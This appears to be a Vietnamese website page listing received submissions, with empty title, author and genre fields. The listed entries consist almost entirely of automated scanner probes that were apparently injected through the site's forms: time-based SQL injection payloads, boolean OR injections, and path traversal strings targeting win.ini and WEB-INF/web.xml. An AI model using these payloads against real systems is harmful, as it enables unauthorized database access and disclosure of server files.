BÀI  NHẬN  ĐƯỢC

20  MỚI GỞI

Đã nhận  3279  bài

Tựa bài:


Tác giả:


Thể loại:


jlKF8lSw'));select pg_sleep(3); -- 1
.....
cvaFL9fl');select pg_sleep(3); -- 1
.....
h7TzALol';select pg_sleep(9); -- 1
.....
-1));select pg_sleep(9); -- 1
.....
-1);select pg_sleep(6); -- 1
.....
-1;select pg_sleep(6); -- 1
.....
2ydzZQnb')); waitfor delay '0:0:6' -- 1
.....
dn0k1rwV'); waitfor delay '0:0:6' -- 1
.....
4oOVNeer'; waitfor delay '0:0:6' -- 1
.....
1 waitfor delay '0:0:3' -- 1
.....
-1)); waitfor delay '0:0:3' -- 1
.....
-1); waitfor delay '0:0:3' -- 1
.....
-1; waitfor delay '0:0:9' -- 1
.....
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/ 1
.....
0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z 1
.....
0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z 1
.....
if(now()=sysdate(),sleep(9),0) 1
.....
-1" OR 2+667-667-1=0+0+0+1 -- 1
.....
-1' OR 2+706-706-1=0+0+0+1 or 'ODUtZR9n'=' 1
.....
-1' OR 2+970-970-1=0+0+0+1 -- 1
.....
-1 OR 2+634-634-1=0+0+0+1 1
.....
-1 OR 2+720-720-1=0+0+0+1 -- 1
.....
8hsYqR7l 1
.....
1 1
.....
1 1
.....
1 1
..... p980sDQn'));select pg_sleep(6); --
1 1
..... IxROxS6F');select pg_sleep(3); --
1 1
..... GT1cPoh4';select pg_sleep(3); --
1 1
..... -1));select pg_sleep(9); --
1 1
..... -1);select pg_sleep(9); --
1 1
..... -1;select pg_sleep(9); --
1 1
..... omSnZCzA')); waitfor delay '0:0:6' --
1 1
..... wj7kwy3C'); waitfor delay '0:0:6' --
1 1
..... cONGjHzv'; waitfor delay '0:0:3' --
1 1
..... 1 waitfor delay '0:0:3' --
1 1
..... -1)); waitfor delay '0:0:9' --
1 1
..... -1); waitfor delay '0:0:6' --
1 1
..... -1; waitfor delay '0:0:6' --
1 1
..... 0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z
1 1
..... 0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z
1 1
..... if(now()=sysdate(),sleep(9),0)
1 1
..... -1" OR 2+37-37-1=0+0+0+1 --
1 1
..... -1' OR 2+600-600-1=0+0+0+1 or 'uiW5g8MD'='
1 1
..... -1' OR 2+776-776-1=0+0+0+1 --
1 1
..... -1 OR 2+172-172-1=0+0+0+1
1 1
..... -1 OR 2+383-383-1=0+0+0+1 --
1 1
..... Zacfv2gn
1 1
..... 1
1 1
..... 1
1 mZSZMhDh'));select pg_sleep(9); --
.....
1 BKRsb61C');select pg_sleep(9); --
.....
1 5I3Mo3Tz';select pg_sleep(6); --
.....
1 -1));select pg_sleep(3); --
.....
1 -1);select pg_sleep(3); --
.....
1 -1;select pg_sleep(9); --
.....
1 6YNziXLQ')); waitfor delay '0:0:9' --
.....
1 zggdlEQ2'); waitfor delay '0:0:6' --
.....
1 oPQWy8y8'; waitfor delay '0:0:6' --
.....
1 1 waitfor delay '0:0:3' --
.....
1 -1)); waitfor delay '0:0:3' --
.....
1 -1); waitfor delay '0:0:9' --
.....
1 -1; waitfor delay '0:0:9' --
.....
1 0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z
.....
1 0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z
.....
1 if(now()=sysdate(),sleep(3),0)
.....
1 -1" OR 2+413-413-1=0+0+0+1 --
.....
1 -1' OR 2+997-997-1=0+0+0+1 or 'bRjVnijP'='
.....
1 -1' OR 2+299-299-1=0+0+0+1 --
.....
1 -1 OR 2+118-118-1=0+0+0+1
.....
1 -1 OR 2+755-755-1=0+0+0+1 --
.....
1 L2RTk49O
.....
1 1
.....
1 1
.....
1 1
.....
1 1
.....
1 1
.....
1 1
.....
1 1
.....
1 1
.....
1 1
.....
1 1
.....
WEB-INF\web.xml 1
.....
1 1
.....
WEB-INF/web.xml 1
.....
1 1
.....
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\ 1
.....
1 1
.....
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini 1
.....
1 1
.....
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini 1
.....
1 1
.....
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini 1
.....
1 1
.....
..\..\..\..\..\..\..\..\windows\win.ini 1
.....
1 1
.....
................windowswin.ini 1
.....
1 1
.....
������������������������������������������������windows��win.ini 1
.....
1 1
.....
../../../../../../../../../../windows/win.ini 1
.....